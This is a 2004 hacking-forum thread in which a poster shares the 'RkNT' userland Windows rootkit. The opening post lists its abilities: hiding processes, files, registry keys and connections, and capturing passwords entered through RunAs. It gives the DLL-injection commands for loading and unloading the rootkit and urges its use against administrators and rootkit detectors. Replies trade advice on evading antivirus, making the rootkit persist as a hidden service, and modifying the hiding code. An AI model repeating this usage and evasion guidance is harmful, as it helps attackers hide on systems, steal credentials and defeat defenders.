Redkod Rootkit V1.0

Alexander01

Jul 9 2004, 06:37 AM

CODE

|=----------=[ RkNT 1.0 : The Real NT Ring3 Infection ]=-----------=|
|=-----------------------------------------------------------------=|
|=------------=[ R-e-D of RedKod <r-e-d@redkod.com> ]=-------------=|

, ,
/( )`
\ \___ / |
/- _ `-/ '
(/\/ \ \ /\
/ / | ` \
O O ) / |
`-^--'`< '
(_.) _ ) /
`.___/` /
`-----' /
<----. __ / __ \
R 0 0 T K I T <----|=====O)))==) \) /====
<----' `--' `.__,' \
| |
\ /
______( (_ / \______
,' ,-----' | \
`--{__________) \/

This rootkit can not only hide process, files, or directories, or regkeys or connections,
but also retrieve NT passwords or forbids deletion of misc files, from windows explorer or
from MS-DOS command line (cmd.exe). Files and directories are even hidden by those last
Windows tools. They're also invisible for tlist.exe and WinTask PRO.

About connections, you can note that every port number over 65400 and under 65499 can't be seen
within netstat.exe.;]

You can retrieve NT passwords by using the RunAs feature. The rootkit hooks
the function to catch the given password. Passwords list is available in the file "%systemrootdir%\winini.sys".

Very Important, this rootkit completely runs in USERLAND (RING3), no kernel module is needed;].
This type of rootkit is more robust and is not detected by currents antivirus.

To Compile RkNTLoad:
cd RkNTLoad
nmake

To load the rootkit (take care to use the full path to the rootkit binary)
c:\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l
[*] explorer.exe => PID [1196]
[*] DLL: c:\RkNT\RkNT.dll
[*] Injection de la DLL.
=> Injection de la DLL effectuée avec succès.

Once the rootkit is running, every process, files, directories, registry keys
whose names begins with '_' (underscore) are hidden !

You can check to see if it's running with this command:
C:\RkNT>RkNTLoad -p explorer.exe -m | find "RkNT
0x00B60000 c:\RkNT\RkNT.dll

If you want to unload the rootkit just proceed like this:
:\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -u
[*] explorer.exe => PID [1196]
[*] Récup?ration d'un handle sur la DLL chargée.
=> DLL trouvée ? l'adresse 0x00B60000.
[*] Déchargement de la DLL en cours...
=> DLL d?chargée avec succès.

For remarks, questions you can contact me at r-e-d[at]redkod.com or get me on
the RedKod forum : http://www.redkod.com/phorum/

--
R-e-D, RedKod Team
r-e-d@redkod.com
http://www.redkod.com/
http://r-e-d.redkod.com/
GnuPG v1.0.6 (GNU/Linux) ID 0x4D572372

Use it for your str0's against that agressive admins from these days! AND those F*KKING admins with rootkit detectors!
enjoy peeps

Tyrano

Jul 9 2004, 06:52 AM

looks like it has some great features. now, how do we detect it

popo0421

Jul 9 2004, 08:31 AM

Thanks for share this rootkit ! and test it work ok!

shiz

Jul 9 2004, 08:32 AM

fprot antivirus detetcts it right away upon starting the download

shiz

Jul 9 2004, 08:43 AM

oops, doubleposted as per accident..

Lanig

Jul 9 2004, 11:36 AM

detected by kav too...
but its open source wont be hard making it totally undetectable

jhd

Jul 9 2004, 11:42 AM

thx for the share

Killahbee

Jul 9 2004, 12:06 PM

intresting, lemme see

h3llraz0r

Jul 9 2004, 01:27 PM

looks great thanks for the rootkit! detected by f-secure also.

Venom

Jul 9 2004, 09:54 PM

Don't be surprised .. Not detected by McAfee as of now.

Can someone plz translate the comments in the code to english

jpno5

Jul 10 2004, 01:10 AM

has any1 got this 2 work. i compiled it ok and ran. the dll loads but its only folders and files it will hide, i can still view the procesees and regkeys and c the connection in netstat

blahplok

Jul 10 2004, 01:36 AM

thank's, fos sharing this rk, anyone can tell me where i can find ms_blaster source code?

kenshin_efx

Jul 10 2004, 04:35 AM

hummmm thabkz alot for share your toolz mand, i really to appreciate that.

jockel

Jul 11 2004, 08:36 PM

nice one ..
thanks 4 distributing the source along with it...

globey

Jul 11 2004, 10:36 PM

its nice r00tkit dude.
tnx for that.

tibbar

Jul 12 2004, 07:23 AM

well thats very useful. thanx.

btw use alternative compilers to make it undetected

Mux99

Jul 12 2004, 12:02 PM

Hey nice rootkit.... with really nice options.

I will try to modd the surce...

Thx for sharing !

Jimbras

Jul 13 2004, 01:41 PM

Thanks for this. gonna check it out

michael

Jul 13 2004, 02:17 PM

k...thx for sharing
i tried it ..seems to work but i dont get the "underline" thing... " _ "
those should be invisible but when i do fport i can still see my blabla.exe running
so i should rename my blabla.exe to _blabla.exe...right?

am i doing something wrong here ?!!?

winxpdll

Jul 13 2004, 05:16 PM

Awesome !
Thanks A LOT for distributing the source code...
Pls add this mod 4 simplify configuration :

CODE

#define HIDE_FILE_MASK "_"
.....
//mod : if (filename[0] == '_')
if (filename[0] == HIDE_FILE_MASK )
return TRUE;
......

...or something like this.

[Z]castor

Jul 13 2004, 08:29 PM

thanx sharing that nice rootkit

braini

Jul 14 2004, 07:52 AM

QUOTE (michael @ Jul 13 2004, 02:17 PM)

k...thx for sharing
i tried it ..seems to work but i dont get the "underline" thing... " _ "
those should be invisible but when i do fport i can still see my blabla.exe running
so i should rename my blabla.exe to _blabla.exe...right?

am i doing something wrong here ?!!?

or u just modify the sozurce and compile a dll for your needs / files....

shouldnt be that hard

predx

Jul 14 2004, 02:21 PM

hey thanks for posting this rootkit!!!

macca

Jul 14 2004, 11:38 PM

thankyou, for this new piece of s/w, i will have something diff to test out... much appreciated ..

also not reported by mcafee with latest definitions..

globey

Jul 14 2004, 11:56 PM

i have to run the rootkit with this command?

CODE

RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l

or i can choos another -p?
like:

CODE

RkNTLoad -p GSO.exe -d c:\RkNT\RkNT.dll -l

or something like that.?

and i need to run the rootkit one time?
or every time the computer is rebooted?

strohunter

Jul 15 2004, 12:47 AM

you can inject every process you want with the dll it will be rootkited, but, you will need the inject every process you want to be rootkited. its not very usefull is it ? ^^

if you inject explorer.exe, each new created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll, this fonction has been of course hooked to automatically inject each new created process.

and yes you will need to run the rootkit each time the computer reboot ^^

globey

Jul 15 2004, 10:16 AM

QUOTE (strohunter @ Jul 15 2004, 12:47 AM)

you can inject every process you want with the dll it will be rootkited, but, you will need the inject every process you want to be rootkited. its not very usefull is it ? ^^

if you inject explorer.exe, each new created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll, this fonction has been of course hooked to automatically inject each new created process.

and yes you will need to run the rootkit each time the computer reboot ^^

so its not the best root kit :\

tnx for the answer

strohunter

Jul 15 2004, 09:12 PM

QUOTE (globey @ Jul 15 2004, 10:16 AM)

so its not the best root kit :\

tnx for the answer

what ?

injected the dll in explorer.exe is the only (proper) way to have any process automatically rootkited with a pure userland rootkit (well as i know...)
mine work in a very similirar way.

about the *reboot* problem, its just your job to make it as a system service, or a "run regkey", and its not quite difficult :s

braini

Jul 16 2004, 06:49 AM

QUOTE (strohunter @ Jul 15 2004, 09:12 PM)

about the *reboot* problem, its just your job to make it as a system service, or a "run regkey", and its not quite difficult :s

especially when u can hide registry keys ;]

strohunter

Jul 16 2004, 08:56 AM

QUOTE (braini @ Jul 16 2004, 06:49 AM)

QUOTE (strohunter @ Jul 15 2004, 09:12 PM)

about the *reboot* problem, its just your job to make it as a system service, or a "run regkey", and its not quite difficult :s

especially when u can hide registry keys ;]

yep ^__^ (but i prefer system service, to give the rootkit/backdoor, nt authority rights)

espey

Jul 16 2004, 01:13 PM

Big thx this r00tkit is very usefull :]

passi

Jul 16 2004, 01:14 PM

Thanks for this one

Very interesting!

ANTITRUST

Jul 16 2004, 03:44 PM

Following my test in remote, it functions very well

Thank you for this rookit !

DougieShiney

Jul 18 2004, 06:04 PM

cheers for the source , code be easy to change and make none detectable version

t0bban

Jul 18 2004, 09:05 PM

I read about this somewhere..
Seems to kick arse.. Is it alright? Cheers.

z73

Jul 18 2004, 11:36 PM

this really looks like kicking ass. Worth a try thx for sharing

MxMx

Sep 12 2004, 07:43 AM

hey peeps,

ive tried it to compile but how to do this?..

ive tried it with the rknt.dll already in the package but still my folders beginning with _ are seeable

plz helpzor me

Gargoyle

Sep 14 2004, 09:01 PM

I started the Rootkit and injected the explorer.exe.
but i can see folders oder files with "_". The explorer.exe
seems not to be injected.

started with RkNTLoad -p explorer.exe -d RkNT.dll -l

what can be the problem ?

many thx

tonikgin

Sep 15 2004, 10:57 PM

QUOTE

You can retrieve NT passwords by using the RunAs feature. The rootkit hooks
the function to catch the given password. Passwords list is available in the file "%systemrootdir%\winini.sys".

the winini.sys file idea needs more thought put into it. this filename itself is suspicious, and also searching for the file itself could be used to detect presence of this rootkit since the filename is unique to this version.

im guessing this isnt an open source project?

crosis

Sep 16 2004, 06:13 AM

wow nice
thx

Sigmatador

Sep 16 2004, 12:14 PM

@Gargoyle
use the full path of the dll: (ex: "c:\rknt.dll")

@tonikgin
GNU GPL, and well commented (in french)

@all
this release is a bunch of bug, wait the next release ^^

ivanchin99

Oct 2 2004, 10:39 AM

guys.. can any1 guide me into making this rootkit undetectable???

click

Oct 2 2004, 01:44 PM

Wow, thanks for the rootkit!

This should help me out quite a bit, especially with the source code. I am working on making a metasploit payload set that include rootkits, and a non-kernel driver rootkit would be perfect!

Thanks for the excellent post

elbarto95

Oct 2 2004, 04:07 PM

thanks for sharing

rgds

ivanchin99

Oct 3 2004, 09:06 AM

guys.. i need some guide here..
how do i make it err unique, undetectable..?
izzit by disassemble it and reassemble it??
do i need programing skills for this?

im new to this kind of thing..

devil666

Oct 5 2004, 07:39 PM

Thanx For the rootkit...

Will have a try

{$ fireburn $}

Oct 6 2004, 06:59 AM

for me this rk is not so bad but hxdef si really better !!!
for many thinx, like the disk size modification, et for the possibility to hide that we want, not only all begin by _

because, many exe aren't hexeditable, and so we can't modifi thet service name ...

belgther

Oct 6 2004, 02:59 PM

but a rootkit means nothing if there's not a shell server or sth. like that... or how does it work?

mogwai

Oct 7 2004, 01:53 PM

interesting...
miam miam
thanks for this soft :]

perky

Oct 7 2004, 03:48 PM

Thanks, Very good ! :-)